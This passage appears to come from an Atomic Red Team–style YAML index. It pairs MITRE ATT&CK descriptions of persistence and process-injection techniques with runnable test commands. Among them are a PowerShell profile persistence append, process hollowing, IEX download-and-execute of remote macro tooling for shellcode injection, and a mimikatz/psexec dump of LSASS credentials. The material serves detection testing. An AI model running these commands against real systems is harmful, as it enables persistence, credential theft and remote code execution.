PowerShell Cheat Sheet + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: PowerShell Profile + description: "Adversaries may gain persistence and elevate privileges by executing + malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) + is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) + starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) + supports several profiles depending on the user or host program. For example, + there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) + host programs such as the PowerShell console, PowerShell ISE or Visual Studio + Code. An administrator can also configure a profile that applies to all users + and host programs on the local computer. (Citation: Microsoft About Profiles) + \n\nAdversaries may modify these profiles to include arbitrary commands, functions, + modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) + drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) + session the modified script will be executed unless the -NoProfile + flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) + \n\nAn adversary may also be able to escalate privileges if a script in a + PowerShell profile is loaded and executed by an account with higher privileges, + such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)" + id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:31:31.082Z' + created: '2020-01-24T15:11:02.758Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: + + * $PsHome\Profile.ps1 + * $PsHome\Microsoft.{HostProgram}_profile.ps1 + * $Home\My Documents\PowerShell\Profile.ps1 + * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 + + Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Allen DeRyke, ICE + x_mitre_platforms: + - Windows + identifier: T1546.013 + atomic_tests: + - name: Append malicious start-process cmdlet + auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' + description: 'Appends a start process cmdlet to the current user''s powershell + profile pofile that points to a malicious executable. Upon execution, calc.exe + will be launched. + +' + supported_platforms: + - windows + input_arguments: + exe_path: + description: Path the malicious executable + type: Path + default: calc.exe + ps_profile: + description: Powershell profile to use + type: String + default: "$profile" + dependency_executor_name: powershell + dependencies: + - description: 'Ensure a powershell profile exists for the current user + +' + prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} + +' + get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force + +' + executor: + command: | + Add-Content #{ps_profile} -Value "" + Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" + powershell -Command exit + cleanup_command: | + $oldprofile = cat $profile | Select-Object -skiplast 1 + Set-Content $profile -Value $oldprofile + name: powershell + T1547.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.012 + url: https://attack.mitre.org/techniques/T1547/012 + - source_name: Microsoft AddPrintProcessor May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor + description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved + October 5, 2020. + - source_name: ESET PipeMon May 2020 + url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti + Group. Retrieved August 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Print Processors + description: "Adversaries may abuse print processors to run malicious DLLs during + system boot for persistence and/or privilege escalation. Print processors + are DLLs that are loaded by the print spooler service, spoolsv.exe, during + boot. \n\nAdversaries may abuse the print spooler service by adding print + processors that load malicious DLLs at startup. A print processor can be installed + through the AddPrintProcessor API call with an account that has + SeLoadDriverPrivilege enabled. Alternatively, a print processor + can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet + or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: + e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry + key that points to the DLL. For the print processor to be correctly installed, + it must be located in the system print-processor directory that can be found + with the GetPrintProcessorDirectory API call.(Citation: Microsoft + AddPrintProcessor May 2018) After the print processors are installed, the + print spooler service, which starts during boot, must be restarted in order + for them to run.(Citation: ESET PipeMon May 2020) The print spooler service + runs under SYSTEM level permissions, therefore print processors installed + by an adversary may run under elevated privileges." + id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T16:05:36.344Z' + created: '2020-10-05T13:24:49.780Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. + + Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. + x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + x_mitre_contributors: + - Mathieu Tartare, ESET + x_mitre_platforms: + - Windows + atomic_tests: [] + T1055.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.009 + url: https://attack.mitre.org/techniques/T1055/009 + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - source_name: GDS Linux Injection + url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html + description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code + Injection Without Ptrace(2). Retrieved February 21, 2020. + - source_name: DD Man + url: http://man7.org/linux/man-pages/man1/dd.1.html + description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved + February 21, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Proc Memory + description: "Adversaries may inject malicious code into processes via the /proc + filesystem in order to evade process-based defenses as well as possibly elevate + privileges. Proc memory injection is a method of executing arbitrary code + in the address space of a separate live process. \n\nProc memory injection + involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) + then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. + Each running process has its own directory, which includes memory mappings. + Proc memory injection is commonly performed by overwriting the target processes’ + stack using memory mappings provided by the /proc filesystem. This information + can be used to enumerate offsets (including the stack) and gadgets (or instructions + within the program that can be used to build a malicious payload) otherwise + hidden by process memory protections such as address space layout randomization + (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps + can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux + Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker + Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate + a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), + proc memory injection may target child processes (such as a backgrounded copy + of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context + of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via proc memory injection + may also evade detection from security products since the execution is masked + under a legitimate process. " + id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-06-20T22:25:55.331Z' + created: '2020-01-14T01:34:10.588Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'File: File Modification' + x_mitre_detection: "File system monitoring can determine if /proc files are + being modified. Users should not have permission to modify these in most cases. + \n\nAnalyze process behavior to determine if a process is performing actions + it usually does not, such as opening network connections, reading files, or + other suspicious actions that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + atomic_tests: [] + T1055.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.013 + url: https://attack.mitre.org/techniques/T1055/013 + - url: https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx + description: Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December + 20, 2017. + source_name: Microsoft TxF + - url: https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx + description: Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, + 2017. + source_name: Microsoft Basic TxF Concepts + - url: https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx + description: Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved + December 20, 2017. + source_name: Microsoft Where to use TxF + - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf + description: 'Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: + Process Doppelgänging. Retrieved December 20, 2017.' + source_name: BlackHat Process Doppelgänging Dec 2017 + - url: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ + description: hasherezade. (2017, December 18). Process Doppelgänging – a new + way to impersonate a process. Retrieved December 20, 2017. + source_name: hasherezade Process Doppelgänging Dec 2017 + - url: https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx + description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved + December 20, 2017. + source_name: Microsoft PsSetCreateProcessNotifyRoutine routine + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Process Doppelgänging + description: "Adversaries may inject malicious code into process via process + doppelgänging in order to evade process-based defenses as well as possibly + elevate privileges. Process doppelgänging is a method of executing arbitrary + code in the address space of a separate live process. \n\nWindows Transactional + NTFS (TxF) was introduced in Vista as a method to perform safe file operations. + (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted + handle to write to a file at a given time. Until the write handle transaction + is terminated, all other handles are isolated from the writer and may only + read the committed version of the file that existed at the time the handle + was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, + TxF performs an automatic rollback if the system or application fails during + a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, + the TxF application programming interface (API) is still enabled as of Windows + 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may + abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). + Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), + process doppelgänging involves replacing the memory of a legitimate process, + enabling the veiled execution of malicious code that may evade defenses and + detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored + API functions such as NtUnmapViewOfSection, VirtualProtectEx, + and SetThreadContext. (Citation: BlackHat Process Doppelgänging + Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat + Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction + using a legitimate executable then overwrite the file with malicious code. + These changes will be isolated and only visible within the context of the + transaction.\n* Load – Create a shared section of memory and load the malicious + executable.\n* Rollback – Undo changes to original executable, effectively + removing malicious code from the file system.\n* Animate – Create a process + from the tainted section of memory and initiate execution.\n\nThis behavior + will likely not result in elevated privileges since the injected process was + spawned from (and thus inherits the security context) of the injecting process. + However, execution via process doppelgänging may evade detection from security + products since the execution is masked under a legitimate process. " + id: attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:43:48.848Z' + created: '2020-01-14T17:19:50.978Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'File: File Metadata' + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_detection: |- + Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017) + + Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017) + + Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1055.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.012 + url: https://attack.mitre.org/techniques/T1055/012 + - url: http://www.autosectools.com/process-hollowing.pdf + description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, + 2014. + source_name: Leitch Hollowing + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Process Hollowing + description: "Adversaries may inject malicious code into suspended and hollowed + processes in order to evade process-based defenses. Process hollowing is a + method of executing arbitrary code in the address space of a separate live + process. \n\nProcess hollowing is commonly performed by creating a process + in a suspended state then unmapping/hollowing its memory, which can then be + replaced with malicious code. A victim process can be created with native + Windows API calls such as CreateProcess, which includes a flag + to suspend the processes primary thread. At this point the process can be + unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection + \ before being written to, realigned to the injected code, and resumed via + VirtualAllocEx, WriteProcessMemory, SetThreadContext, + then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: + Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local + Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new + process rather than targeting an existing process. This behavior will likely + not result in elevated privileges since the injected process was spawned from + (and thus inherits the security context) of the injecting process. However, + execution via process hollowing may also evade detection from security products + since the execution is masked under a legitimate process. " + id: attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:31.031Z' + created: '2020-01-14T17:21:54.470Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + and those that can be used to modify memory within another process, such as + VirtualAllocEx/WriteProcessMemory, may be used for + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1055.012 + atomic_tests: + - name: Process Hollowing using PowerShell + auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c + description: | + This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. + Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) + supported_platforms: + - windows + input_arguments: + hollow_binary_path: + description: Path of the binary to hollow (executable that will run inside + the sponsor) + type: string + default: C:\Windows\System32\cmd.exe + parent_process_name: + description: Name of the parent process + type: string + default: explorer + sponsor_binary_path: + description: Path of the sponsor binary (executable that will host the binary) + type: string + default: C:\Windows\System32\notepad.exe + spawnto_process_name: + description: Name of the process to spawn + type: string + default: notepad + executor: + command: | + . $PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 + $ppid=Get-Process #{parent_process_name} | select -expand id + Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose + cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction + Ignore + +' + name: powershell + - name: RunPE via VBA + auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b + description: 'This module executes notepad.exe from within the WINWORD.EXE process + +' + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" + name: powershell + T1055: + technique: + created: '2017-05-31T21:30:47.843Z' + modified: '2021-02-09T15:43:50.029Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055 + url: https://attack.mitre.org/techniques/T1055 + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: + Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved + December 20, 2017.' + source_name: ArtOfMemoryForensics + - url: https://www.gnu.org/software/acct/ + description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved + December 20, 2017. + source_name: GNU Acct + - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing + description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - + Chapter 7 - System Auditing. Retrieved December 20, 2017. + source_name: RHEL auditd + - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html + description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. + Retrieved December 20, 2017. + source_name: Chokepoint preload rootkits + - url: https://docs.microsoft.com/sysinternals/downloads/sysmon + description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved + December 13, 2017. + source_name: Microsoft Sysmon v6 May 2017 + description: "Adversaries may inject code into processes in order to evade process-based + defenses as well as possibly elevate privileges. Process injection is a method + of executing arbitrary code in the address space of a separate live process. + Running code in the context of another process may allow access to the process's + memory, system/network resources, and possibly elevated privileges. Execution + via process injection may also evade detection from security products since + the execution is masked under a legitimate process. \n\nThere are many different + ways to inject code into a process, many of which abuse legitimate functionalities. + These implementations exist for every major OS but are typically platform + specific. \n\nMore sophisticated samples may perform multiple process injections + to segment modules and further evade detection, utilizing named pipes or other + inter-process communication (IPC) mechanisms as a communication channel. " + name: Process Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_contributors: + - Anastasios Pingios + - Christiaan Beek, @ChristiaanBeek + - Ryan Becwar + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Metadata' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + QueueUserAPC/NtQueueApcThread, and those that can + be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017) + \n\nMonitor DLL/PE file events, specifically creation of these binary files + as well as the loading of DLLs into processes. Look for DLLs that are not + recognized or not normally loaded into a process. \n\nMonitoring for Linux + specific calls such as the ptrace system call should not generate large amounts + of data due to their specialized nature, and can be a very effective method + to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) + \ (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload + rootkits) \n\nMonitor for named pipe creation and connection events (Event + IDs 17 and 18) for possible indicators of infected processes with external + modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior + to determine if a process is performing actions it usually does not, such + as opening network connections, reading files, or other suspicious actions + that could relate to post-compromise behavior. " + x_mitre_platforms: + - Linux + - macOS + - Windows + identifier: T1055 + atomic_tests: + - name: Shellcode execution via VBA + auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 + description: | + This module injects shellcode into a newly created process and executes. By default the shellcode is created, + with Metasploit, for use on x86-64 Windows 10 machines. + + Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office + is required. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'The 64-bit version of Microsoft Office must be installed + +' + prereq_command: | + try { + $wdApp = New-Object -COMObject "Word.Application" + $path = $wdApp.Path + Stop-Process -Name "winword" + if ($path.contains("(x86)")) { exit 1 } else { exit 0 } + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) + manually to meet this requirement" + +' + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" + name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. + + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false + T1055.008: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.008 + url: https://attack.mitre.org/techniques/T1055/008 + - source_name: PTRACE man + url: http://man7.org/linux/man-pages/man2/ptrace.2.html + description: Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's + Manual. Retrieved February 21, 2020. + - source_name: Medium Ptrace JUL 2018 + url: https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be + description: Jain, S. (2018, July 25). Code injection in running process using + ptrace. Retrieved February 21, 2020. + - source_name: BH Linux Inject + url: https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf + description: Colgan, T. (2015, August 15). Linux-Inject. Retrieved February + 21, 2020. + - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: + Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved + December 20, 2017.' + source_name: ArtOfMemoryForensics + - url: https://www.gnu.org/software/acct/ + description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved + December 20, 2017. + source_name: GNU Acct + - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing + description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - + Chapter 7 - System Auditing. Retrieved December 20, 2017. + source_name: RHEL auditd + - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html + description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. + Retrieved December 20, 2017. + source_name: Chokepoint preload rootkits + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Ptrace System Calls + description: "Adversaries may inject malicious code into processes via ptrace + (process trace) system calls in order to evade process-based defenses as well + as possibly elevate privileges. Ptrace system call injection is a method of + executing arbitrary code in the address space of a separate live process. + \n\nPtrace system call injection involves attaching to and modifying a running + process. The ptrace system call enables a debugging process to observe and + control another process (and each individual thread), including changing memory + and register values.(Citation: PTRACE man) Ptrace system call injection is + commonly performed by writing arbitrary code into a running process (ex: malloc) + then invoking that memory with PTRACE_SETREGS to set the register + containing the next instruction to execute. Ptrace system call injection can + also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, + which copy data to a specific address in the target processes’ memory (ex: + the current address of the next instruction). (Citation: PTRACE man)(Citation: + Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible + targeting processes with high-privileges, and on some system those that are + non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context + of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via ptrace system call + injection may also evade detection from security products since the execution + is masked under a legitimate process. " + id: attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-06-20T22:24:56.734Z' + created: '2020-01-14T01:33:19.065Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system + call should not generate large amounts of data due to their specialized nature, + and can be a very effective method to detect some of the common process injection + methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: + RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process + behavior to determine if a process is performing actions it usually does not, + such as opening network connections, reading files, or other suspicious actions + that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + atomic_tests: [] + T1037.004: + technique: + id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 + description: |- + Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. + + Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the 